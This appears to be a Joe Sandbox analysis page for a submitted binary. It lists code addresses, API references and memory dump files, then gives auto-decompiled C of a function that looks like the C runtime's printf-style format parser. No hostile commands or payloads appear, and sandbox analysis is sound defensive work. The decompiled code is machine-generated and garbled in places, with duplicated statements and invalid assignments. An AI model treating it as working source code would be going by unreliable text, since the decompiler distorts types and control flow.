0x004233b5
0x004233b8
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x0042383b
0x0042383e
0x00423841
0x00423844
0x00000000
0x00000000
0x0042359a
0x0042359a
0x004235a6
0x004235ac
0x004235b1
0x004235b3
0x0042365d
0x0042365d
0x00423660
0x00423660
0x00423663
0x00423677
0x0042367d
0x00423683
0x00423665
0x00423665
0x0042366b
0x00423672
0x00423672
0x00423685
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x004235b9
0x004235b9
0x004235b9
0x004235bb
0x004235c9
0x004235bd
0x004235bd
0x004235bd
0x004235d3
0x004235d9
0x004235df
0x004235e6
0x004235e8
0x004235ed
0x004235ef
0x004235f4
0x004235f9
0x004235fb
0x00423600
0x00423603
0x00423606
0x00423608
0x00423608
0x00423606
0x00423609
0x00423610
0x00423658
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423612
0x00423612
0x00423617
0x00423633
0x0042363b
0x00423645
0x00423648
0x0042364d
0x00000000
0x0042364d
0x00000000
0x004238a4
0x004238a4
0x004238ae
0x004238ae
0x004238b4
0x004238b6
0x004238b9
0x004238b9
0x004238bf
0x004238bf
0x004238c2
0x004238c5
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x0042397e
0x00423982
0x0042398a
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423963
0x00423967
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x0042393d
0x00423949
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423921
0x00423925
0x0042392d
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f4
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238cc
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399b
0x0042399e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042346d
0x0042346d
0x00423471
0x0042347f
0x00423482
0x00423473
0x00423473
0x00423473
0x00423488
0x0042348e
0x00423494
0x004234a0
0x004234a6
0x004234a6
0x004234a9
0x00423531
0x00423531
0x00423535
0x00423537
0x0042353d
0x0042353d
0x00423540
0x00423547
0x0042354a
0x00423550
0x00423550
0x00423550
0x00423556
0x0042355c
0x0042355f
0x00423565
0x00423567
0x00000000
0x00000000
0x00423569
0x00423569
0x0042356f
0x00423572
0x00423574
0x00000000
0x00000000
0x00423576
0x0042357c
0x0042357f
0x0042357f
0x00423587
0x00423587
0x0042358d
0x0042358d
0x00423592
0x00000000
0x004234af
0x004234af
0x004234af
0x004234b3
0x004234b5
0x004234ba
0x004234ba
0x004234bd
0x004234c0
0x004234c6
0x004234d8
0x004234d8
0x004234d8
0x004234db
0x004234e1
0x00000000
0x00000000
0x004234e3
0x004234e3
0x004234e9
0x004234ec
0x004234ee
0x00000000
0x00000000
0x004234f0
0x004234f0
0x004234f9
0x004234ff
0x00423503
0x0042350b
0x0042350d
0x0042350f
0x00423515
0x00423515
0x00423518
0x00423518
0x00423524
0x00423527
0x004234cf
0x004234d2
0x004234d2
0x004234d5
0x004234d5
0x0042352f
0x00423595
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00423b50
0x00000000
0x0042384d
0x0042384d
0x004238c2
0x004238c2
0x004238c5
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x0042397e
0x00423982
0x0042398a
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423963
0x00423967
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x0042393d
0x00423949
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423921
0x00423925
0x0042392d
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f4
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238cc
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399b
0x0042399e
0x00000000
0x00000000
0x00000000
0x0042399e
0x00000000
0x00423869
0x00423869
0x00423873
0x00423873
0x0042387d
0x0042387d
0x00423883
0x00423885
0x0042388a
0x00423894
0x00423894
0x00423897
0x0042389b
0x0042389b
0x004238c2
0x004238c2
0x004238c5
0x004238c5
0x004238ca
0x004238ec
0x004238ec
0x004238f2
0x00423914
0x00423914
0x00423917
0x0042395e
0x0042395e
0x00423961
0x0042397e
0x00423982
0x0042398a
0x0042398a
0x0042398c
0x00423992
0x00423963
0x00423963
0x00423967
0x0042396f
0x00423970
0x00423976
0x00423976
0x00423919
0x0042391c
0x0042391c
0x0042391f
0x0042393d
0x00423949
0x0042394c
0x0042394d
0x00423953
0x00423921
0x00423921
0x00423925
0x0042392d
0x0042392e
0x0042392f
0x00423935
0x00423935
0x00423959
0x004238f4
0x004238f4
0x00423900
0x00423906
0x00423906
0x004238cc
0x004238cc
0x004238d8
0x004238de
0x004238de
0x0042399b
0x0042399b
0x0042399e
0x00000000
0x00000000
0x00000000
0x0042399e
0x00000000
0x00423b50
0x00423b50
0x00423b50
0x00423b54
0x00000000
0x00000000
0x00000000
0x00423b54
0x00000000
0x00000000
0x004230d9
0x004230d9
0x004230dc
0x004230df
0x00000000
0x00000000
0x004230e4
0x004230e7
0x004230ed
0x00000000
0x00000000
0x004230ce
0x004230d1
0x004230d4
0x00000000
0x00000000
0x004230c3
0x004230c6
0x004230c9
0x00000000
0x00000000
0x004230f2
0x004230f2
0x004230f5
0x004230f5
0x004230f8
0x00000000
0x00000000
0x004230fb
0x00000000
0x00000000
0x00422f6b
0x00422f6b
0x00422f6d
0x00422f7b
0x00422f6f
0x00422f6f
0x00422f6f
0x00422f8b
0x00422f98
0x00422f9a
0x00422f9f
0x00422fa1
0x00422fa6
0x00422fab
0x00422fad
0x00422fb2
0x00422fb8
0x00422fba
0x00422fba
0x00422fb8
0x00422fbb
0x00422fc2
0x00000000
0x00422fc4
0x00422fc9
0x00422fe5
0x00422fed
0x00422ffa
0x00422fff
0x00423e14
0x00423e21
0x00423e21
0x00422fc2
0x00422f65
0x00423d50
0x00423d50
0x00423d57
0x00423d6e
0x00423d6e
0x00423d78
0x00423d78
0x00423d7e
0x00423d84
0x00423d8b
0x00423d8d
0x00423d92
0x00423d94
0x00423d99
0x00423d9e
0x00423da0
0x00423da5
0x00423da8
0x00423dab
0x00423dad
0x00423dad
0x00423dab
0x00423dae
0x00423db5
0x00423e00
0x00423e09
0x00423e0e
0x00423db7
0x00423dbc
0x00423dd8
0x00423de0
0x00423ded
0x00423df2
0x00423df2
0x00000000
0x00423db5
0x00423d59
0x00423d59
0x00423d60
0x00000000
0x00000000
0x00423d62
0x00423d62
0x00000000
0x00423d62
0x00423b50
0x00423b27
0x00423b27
0x00423b2b
0x00423b38
0x00423b3b
0x00423b3e
0x00423b41
0x00423b44
0x00423b47
0x00423b4a
0x00423b4a
0x00423b4d
0x00000000
0x00423b4d
0x00423b2d
0x00423b2d
0x00423b30
0x00423b33
0x00423b36
0x00000000
0x00000000
0x00000000
0x00423b36
0x00423a8c
0x00423a8c
0x00423a8f
0x00423a92
0x00423a99
0x00423aa0
0x00423aa8
0x00423aae
0x00423ab1
0x00423ab4
0x00423abb
0x00423ac7
0x00423acd
0x00423ad3
0x00423ada
0x00423adc
0x00423ae2
0x00423ae2
0x00423ae8
0x00423ae8
0x00423aee
0x00423af7
0x00423afc
0x00423aff
0x00423a6e
0x00423a6e
0x00423a74
0x00423a77
0x00423a7a
0x00423a7c
0x00000000
0x00000000
0x00000000
0x00423a7c
0x00423a6e
0x004239ab
0x004239ab
0x004239b2
0x00000000
0x00000000
0x00000000
0x004239e0
0x004239e0
0x004239e6
0x004239ec
0x004239f2
0x00000000
0x004239f2
0x004238c2
0x00423873
0x0042385d

APIs

_get_int64_arg.LIBCMTD ref: 004238D0
__aullrem.LIBCMT ref: 00423AA0
__aulldiv.LIBCMT ref: 00423AC2

Strings

9, xrefs: 00423AD3

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 59fdb8b182f165bae38f991a4918028ffcdcac49635e5a88ae7822539d02c8ac
Instruction ID: 166605e23b5a355a061385bb764382096187449ff709e54d6f7522b7d2f608bd
Opcode Fuzzy Hash: 59fdb8b182f165bae38f991a4918028ffcdcac49635e5a88ae7822539d02c8ac
Instruction Fuzzy Hash: 5F4127B1E101299FDF24CF48D841BAEB7B5FF85315F5041AAE188AB240C7789E85CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 004238A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E004238A4() {
				signed int _t483;
				signed int _t502;
				void* _t507;
				signed int _t509;
				void* _t517;
				void* _t535;
				signed int _t539;
				signed int _t552;
				signed int _t556;
				signed short _t557;
				signed int _t560;
				signed int _t563;
				signed int _t564;
				intOrPtr _t565;
				signed int _t613;
				signed int _t621;
				signed int _t623;
				signed int _t625;
				signed int _t632;
				signed int _t636;
				signed int _t644;
				signed int _t671;
				intOrPtr _t672;
				intOrPtr _t673;
				signed int _t674;
				void* _t676;

				L0:
				while(1) {
					L0:
					 *(_t674 - 8) = 8;
					if(( *(_t674 - 0x10) & 0x00000080) != 0) {
						__edx =  *(__ebp - 0x10);
						__edx =  *(__ebp - 0x10) | 0x00000200;
						__eflags = __edx;
						 *(__ebp - 0x10) = __edx;
					}
					while(1) {
						L150:
						__eflags =  *(_t674 - 0x10) & 0x00008000;
						if(( *(_t674 - 0x10) & 0x00008000) == 0) {
							_t623 =  *(_t674 - 0x10) & 0x00001000;
							__eflags = _t623;
							if(_t623 == 0) {
								__eflags =  *(_t674 - 0x10) & 0x00000020;
								if(( *(_t674 - 0x10) & 0x00000020) == 0) {
									_t625 =  *(_t674 - 0x10) & 0x00000040;
									__eflags = _t625;
									if(_t625 == 0) {
										_t483 = E0041F270(_t674 + 0x14);
										_t676 = _t676 + 4;
										__eflags = 0;
										 *(_t674 - 0x4a0) = _t483;
										 *(_t674 - 0x49c) = 0;
									} else {
										_t556 = E0041F270(_t674 + 0x14);
										_t676 = _t676 + 4;
										asm("cdq");
										 *(_t674 - 0x4a0) = _t556;
										 *(_t674 - 0x49c) = _t625;
									}
								} else {
									_t671 =  *(_t674 - 0x10) & 0x00000040;
									__eflags = _t671;
									if(_t671 == 0) {
										_t557 = E0041F270(_t674 + 0x14);
										_t676 = _t676 + 4;
										asm("cdq");
										 *(_t674 - 0x4a0) = _t557 & 0x0000ffff;
										 *(_t674 - 0x49c) = _t671;
									} else {
										_t560 = E0041F270(_t674 + 0x14);
										_t676 = _t676 + 4;
										asm("cdq");
										 *(_t674 - 0x4a0) = _t560;
										 *(_t674 - 0x49c) = _t671;
									}
								}
							} else {
								_t563 = E0041F290(_t674 + 0x14);
								_t676 = _t676 + 4;
								 *(_t674 - 0x4a0) = _t563;
								 *(_t674 - 0x49c) = _t623;
							}
						} else {
							_t564 = E0041F290(_t674 + 0x14);
							_t676 = _t676 + 4;
							 *(_t674 - 0x4a0) = _t564;
							 *(_t674 - 0x49c) = _t621;
						}
						__eflags =  *(_t674 - 0x10) & 0x00000040;
						if(( *(_t674 - 0x10) & 0x00000040) == 0) {
							goto L167;
						}
						L163:
						__eflags =  *(_t674 - 0x49c);
						if(__eflags > 0) {
							goto L167;
						}
						L164:
						if(__eflags < 0) {
							L166:
							asm("adc edx, 0x0");
							 *(_t674 - 0x4a8) =  ~( *(_t674 - 0x4a0));
							 *(_t674 - 0x4a4) =  ~( *(_t674 - 0x49c));
							 *(_t674 - 0x10) =  *(_t674 - 0x10) | 0x00000100;
							L168:
							__eflags =  *(_t674 - 0x10) & 0x00008000;
							if(( *(_t674 - 0x10) & 0x00008000) == 0) {
								__eflags =  *(_t674 - 0x10) & 0x00001000;
								if(( *(_t674 - 0x10) & 0x00001000) == 0) {
									_t552 =  *(_t674 - 0x4a4) & 0x00000000;
									__eflags = _t552;
									 *(_t674 - 0x4a4) = _t552;
								}
							}
							__eflags =  *(_t674 - 0x30);
							if( *(_t674 - 0x30) >= 0) {
								 *(_t674 - 0x10) =  *(_t674 - 0x10) & 0xfffffff7;
								__eflags =  *(_t674 - 0x30) - 0x200;
								if( *(_t674 - 0x30) > 0x200) {
									 *(_t674 - 0x30) = 0x200;
								}
							} else {
								 *(_t674 - 0x30) = 1;
							}
							__eflags =  *(_t674 - 0x4a8) |  *(_t674 - 0x4a4);
							if(( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
								 *(_t674 - 0x1c) = 0;
							}
							 *((intOrPtr*)(_t674 - 4)) = _t674 - 0x249;
							while(1) {
								L178:
								_t631 =  *(_t674 - 0x30) - 1;
								 *(_t674 - 0x30) =  *(_t674 - 0x30) - 1;
								__eflags =  *(_t674 - 0x30);
								if( *(_t674 - 0x30) > 0) {
									goto L180;
								}
								L179:
								__eflags =  *(_t674 - 0x4a8) |  *(_t674 - 0x4a4);
								if(( *(_t674 - 0x4a8) |  *(_t674 - 0x4a4)) == 0) {
									L183:
									 *(_t674 - 0x24) = _t674 - 0x249 -  *((intOrPtr*)(_t674 - 4));
									 *((intOrPtr*)(_t674 - 4)) =  *((intOrPtr*)(_t674 - 4)) + 1;
									__eflags =  *(_t674 - 0x10) & 0x00000200;
									if(( *(_t674 - 0x10) & 0x00000200) == 0) {
										while(1) {
											L187:
											__eflags =  *(_t674 - 0x28);
											if( *(_t674 - 0x28) != 0) {
												goto L212;
											}
											L188:
											__eflags =  *(_t674 - 0x10) & 0x00000040;
											if(( *(_t674 - 0x10) & 0x00000040) != 0) {
												__eflags =  *(_t674 - 0x10) & 0x00000100;
												if(( *(_t674 - 0x10) & 0x00000100) == 0) {
													__eflags =  *(_t674 - 0x10) & 0x00000001;
													if(( *(_t674 - 0x10) & 0x00000001) == 0) {
														__eflags =  *(_t674 - 0x10) & 0x00000002;
														if(( *(_t674 - 0x10) & 0x00000002) != 0) {
															 *((short*)(_t674 - 0x14)) = 0x20;
															 *(_t674 - 0x1c) = 1;
														}
													} else {
														 *((short*)(_t674 - 0x14)) = 0x2b;
														 *(_t674 - 0x1c) = 1;
													}
												} else {
													 *((short*)(_t674 - 0x14)) = 0x2d;
													 *(_t674 - 0x1c) = 1;
												}
											}
											 *((intOrPtr*)(_t674 - 0x4ac)) =  *((intOrPtr*)(_t674 - 0x18)) -  *(_t674 - 0x24) -  *(_t674 - 0x1c);
											__eflags =  *(_t674 - 0x10) & 0x0000000c;
											if(( *(_t674 - 0x10) & 0x0000000c) == 0) {
												E00423F90(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
												_t676 = _t676 + 0x10;
											}
											E00423FD0( *(_t674 - 0x1c), _t674 - 0x14,  *(_t674 - 0x1c),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
											_t676 = _t676 + 0x10;
											__eflags =  *(_t674 - 0x10) & 0x00000008;
											if(( *(_t674 - 0x10) & 0x00000008) != 0) {
												__eflags =  *(_t674 - 0x10) & 0x00000004;
												if(( *(_t674 - 0x10) & 0x00000004) == 0) {
													E00423F90(0x30,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
													_t676 = _t676 + 0x10;
												}
											}
											__eflags =  *(_t674 - 0xc);
											if( *(_t674 - 0xc) != 0) {
												L208:
												E00423FD0( *(_t674 - 0x24),  *((intOrPtr*)(_t674 - 4)),  *(_t674 - 0x24),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
												_t676 = _t676 + 0x10;
												goto L209;
											} else {
												L201:
												__eflags =  *(_t674 - 0x24);
												if( *(_t674 - 0x24) <= 0) {
													goto L208;
												}
												L202:
												 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 4));
												 *(_t674 - 0x4b4) =  *(_t674 - 0x24);
												while(1) {
													L203:
													 *(_t674 - 0x4b4) =  *(_t674 - 0x4b4) - 1;
													__eflags =  *(_t674 - 0x4b4);
													if( *(_t674 - 0x4b4) <= 0) {
														break;
													}
													L204:
													_t535 = E004103A0(_t674 - 0x40);
													_t539 = E00420B60(_t674 - 0x458,  *((intOrPtr*)(_t674 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E004103A0(_t674 - 0x40))) + 0xac)), _t535);
													_t676 = _t676 + 0x10;
													 *(_t674 - 0x4b8) = _t539;
													__eflags =  *(_t674 - 0x4b8);
													if( *(_t674 - 0x4b8) > 0) {
														L206:
														E00423F30( *(_t674 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
														_t676 = _t676 + 0xc;
														 *((intOrPtr*)(_t674 - 0x4b0)) =  *((intOrPtr*)(_t674 - 0x4b0)) +  *(_t674 - 0x4b8);
														continue;
													}
													L205:
													 *(_t674 - 0x44c) = 0xffffffff;
													break;
												}
												L207:
												L209:
												__eflags =  *(_t674 - 0x44c);
												if( *(_t674 - 0x44c) >= 0) {
													__eflags =  *(_t674 - 0x10) & 0x00000004;
													if(( *(_t674 - 0x10) & 0x00000004) != 0) {
														E00423F90(0x20,  *((intOrPtr*)(_t674 - 0x4ac)),  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
														_t676 = _t676 + 0x10;
													}
												}
											}
											L212:
											__eflags =  *(_t674 - 0x20);
											if( *(_t674 - 0x20) != 0) {
												L0040F230( *(_t674 - 0x20), 2);
												_t676 = _t676 + 8;
												 *(_t674 - 0x20) = 0;
											}
											while(1) {
												L214:
												 *(_t674 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t674 + 0xc))));
												_t580 =  *(_t674 - 0x454) & 0x0000ffff;
												 *((intOrPtr*)(_t674 + 0xc)) =  *((intOrPtr*)(_t674 + 0xc)) + 2;
												if(( *(_t674 - 0x454) & 0x0000ffff) == 0 ||  *(_t674 - 0x44c) < 0) {
													break;
												} else {
													if(( *(_t674 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t674 - 0x454) & 0x0000ffff) > 0x78) {
														 *(_t674 - 0x4d8) = 0;
													} else {
														 *(_t674 - 0x4d8) =  *(( *(_t674 - 0x454) & 0x0000ffff) + L"h != _T(\'\\0\'))") & 0xf;
													}
												}
												L7:
												 *(_t674 - 0x450) =  *(_t674 - 0x4d8);
												_t644 =  *(_t674 - 0x450) * 9;
												_t509 =  *(_t674 - 0x45c);
												_t588 = ( *(_t644 + _t509 + 0x4081a0) & 0x000000ff) >> 4;
												 *(_t674 - 0x45c) = ( *(_t644 + _t509 + 0x4081a0) & 0x000000ff) >> 4;
												if( *(_t674 - 0x45c) != 8) {
													L16:
													 *(_t674 - 0x4e0) =  *(_t674 - 0x45c);
													__eflags =  *(_t674 - 0x4e0) - 7;
													if( *(_t674 - 0x4e0) > 7) {
														continue;
													}
													L17:
													switch( *((intOrPtr*)( *(_t674 - 0x4e0) * 4 +  &M00423E24))) {
														case 0:
															L18:
															 *(_t674 - 0xc) = 1;
															E00423F30( *(_t674 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t674 + 8)), _t674 - 0x44c);
															_t676 = _t676 + 0xc;
															goto L214;
														case 1:
															L19:
															 *(__ebp - 0x2c) = 0;
															__ecx =  *(__ebp - 0x2c);
															 *(__ebp - 0x28) = __ecx;
															__edx =  *(__ebp - 0x28);
															 *(__ebp - 0x18) =  *(__ebp - 0x28);
															__eax =  *(__ebp - 0x18);
															 *(__ebp - 0x1c) =  *(__ebp - 0x18);
															 *(__ebp - 0x10) = 0;
															 *(__ebp - 0x30) = 0xffffffff;
															 *(__ebp - 0xc) = 0;
															goto L214;
														case 2:
															L20:
															__ecx =  *(__ebp - 0x454) & 0x0000ffff;
															 *(__ebp - 0x4e4) = __ecx;
															 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
															 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
															__eflags =  *(__ebp - 0x4e4) - 0x10;
															if( *(__ebp - 0x4e4) > 0x10) {
																goto L27;
															}
															L21:
															_t58 =  *(__ebp - 0x4e4) + 0x423e5c; // 0x498d04
															__ecx =  *_t58 & 0x000000ff;
															switch( *((intOrPtr*)(__ecx * 4 +  &M00423E44))) {
																case 0:
																	goto L24;
																case 1:
																	goto L25;
																case 2:
																	goto L23;
																case 3:
																	goto L22;
																case 4:
																	goto L26;
																case 5:
																	goto L27;
															}
														case 3:
															L28:
															__ecx =  *(__ebp - 0x454) & 0x0000ffff;
															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
															if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																__edx =  *(__ebp - 0x18);
																__edx =  *(__ebp - 0x18) * 0xa;
																__eflags = __edx;
																_t82 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																__ecx = __edx + _t82;
																 *(__ebp - 0x18) = __ecx;
															} else {
																__edx = __ebp + 0x14;
																 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																__eflags =  *(__ebp - 0x18);
																if( *(__ebp - 0x18) < 0) {
																	__eax =  *(__ebp - 0x10);
																	__eax =  *(__ebp - 0x10) | 0x00000004;
																	__eflags = __eax;
																	 *(__ebp - 0x10) = __eax;
																	__ecx =  *(__ebp - 0x18);
																	__ecx =  ~( *(__ebp - 0x18));
																	 *(__ebp - 0x18) = __ecx;
																}
															}
															L33:
															goto L214;
														case 4:
															L34:
															 *(__ebp - 0x30) = 0;
															goto L214;
														case 5:
															L35:
															__edx =  *(__ebp - 0x454) & 0x0000ffff;
															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x2a;
															if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
																__ecx =  *(__ebp - 0x30);
																__ecx =  *(__ebp - 0x30) * 0xa;
																__eflags = __ecx;
																_t93 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
																__eax = __ecx + _t93;
																 *(__ebp - 0x30) = __ecx + _t93;
															} else {
																__eax = __ebp + 0x14;
																 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																__eflags =  *(__ebp - 0x30);
																if( *(__ebp - 0x30) < 0) {
																	 *(__ebp - 0x30) = 0xffffffff;
																}
															}
															goto L214;
														case 6:
															L41:
															__ecx =  *(__ebp - 0x454) & 0x0000ffff;
															 *(__ebp - 0x4e8) = __ecx;
															 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
															 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
															__eflags =  *(__ebp - 0x4e8) - 0x2e;
															if( *(__ebp - 0x4e8) > 0x2e) {
																L64:
																goto L214;
															}
															L42:
															_t101 =  *(__ebp - 0x4e8) + 0x423e84; // 0x36919003
															__ecx =  *_t101 & 0x000000ff;
															switch( *((intOrPtr*)(__ecx * 4 +  &M00423E70))) {
																case 0:
																	L47:
																	__ecx =  *(__ebp + 0xc);
																	__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																	__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x36;
																	if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
																		L50:
																		__ecx =  *(__ebp + 0xc);
																		__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																		__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x33;
																		if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
																			L53:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *__ecx & 0x0000ffff;
																			__eflags = ( *__ecx & 0x0000ffff) - 0x64;
																			if(( *__ecx & 0x0000ffff) == 0x64) {
																				L59:
																				L61:
																				goto L64;
																			}
																			L54:
																			__eax =  *(__ebp + 0xc);
																			__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																			__eflags = __ecx - 0x69;
																			if(__ecx == 0x69) {
																				goto L59;
																			}
																			L55:
																			__edx =  *(__ebp + 0xc);
																			__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6f;
																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
																				goto L59;
																			}
																			L56:
																			__ecx =  *(__ebp + 0xc);
																			__edx =  *__ecx & 0x0000ffff;
																			__eflags = ( *__ecx & 0x0000ffff) - 0x75;
																			if(( *__ecx & 0x0000ffff) == 0x75) {
																				goto L59;
																			}
																			L57:
																			__eax =  *(__ebp + 0xc);
																			__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
																			__eflags = __ecx - 0x78;
																			if(__ecx == 0x78) {
																				goto L59;
																			}
																			L58:
																			__edx =  *(__ebp + 0xc);
																			__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																			__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x58;
																			if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
																				 *(__ebp - 0x45c) = 0;
																				goto L18;
																			}
																			goto L59;
																		}
																		L51:
																		__eax =  *(__ebp + 0xc);
																		__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																		__eflags = __ecx - 0x32;
																		if(__ecx != 0x32) {
																			goto L53;
																		} else {
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
																			goto L61;
																		}
																	}
																	L48:
																	__eax =  *(__ebp + 0xc);
																	__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
																	__eflags = __ecx - 0x34;
																	if(__ecx != 0x34) {
																		goto L50;
																	} else {
																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																		 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
																		goto L61;
																	}
																case 1:
																	L62:
																	__ecx =  *(__ebp - 0x10);
																	__ecx =  *(__ebp - 0x10) | 0x00000020;
																	 *(__ebp - 0x10) = __ecx;
																	goto L64;
																case 2:
																	L43:
																	__edx =  *(__ebp + 0xc);
																	__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
																	__eflags = ( *( *(__ebp + 0xc)) & 0x0000ffff) - 0x6c;
																	if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
																		__eax =  *(__ebp - 0x10);
																		__eax =  *(__ebp - 0x10) | 0x00000010;
																		__eflags = __eax;
																		 *(__ebp - 0x10) = __eax;
																	} else {
																		__ecx =  *(__ebp + 0xc);
																		__ecx =  *(__ebp + 0xc) + 2;
																		 *(__ebp + 0xc) = __ecx;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																	}
																	goto L64;
																case 3:
																	L63:
																	__edx =  *(__ebp - 0x10);
																	__edx =  *(__ebp - 0x10) | 0x00000800;
																	__eflags = __edx;
																	 *(__ebp - 0x10) = __edx;
																	goto L64;
																case 4:
																	goto L64;
															}
														case 7:
															L65:
															__eax =  *(__ebp - 0x454) & 0x0000ffff;
															 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
															__ecx =  *(__ebp - 0x4ec);
															__ecx =  *(__ebp - 0x4ec) - 0x41;
															 *(__ebp - 0x4ec) = __ecx;
															__eflags =  *(__ebp - 0x4ec) - 0x37;
															if( *(__ebp - 0x4ec) > 0x37) {
																while(1) {
																	L187:
																	__eflags =  *(_t674 - 0x28);
																	if( *(_t674 - 0x28) != 0) {
																		goto L212;
																	}
																	goto L188;
																}
															}
															L66:
															_t142 =  *(__ebp - 0x4ec) + 0x423ef0; // 0xcccccc0d
															__eax =  *_t142 & 0x000000ff;
															switch( *((intOrPtr*)(( *_t142 & 0x000000ff) * 4 +  &M00423EB4))) {
																case 0:
																	L120:
																	 *(__ebp - 0x2c) = 1;
																	 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																	__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
																	 *(__ebp - 0x454) = __ax;
																	goto L121;
																case 1:
																	L67:
																	 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																	__eflags =  *(__ebp - 0x10) & 0x00000830;
																	if(( *(__ebp - 0x10) & 0x00000830) == 0) {
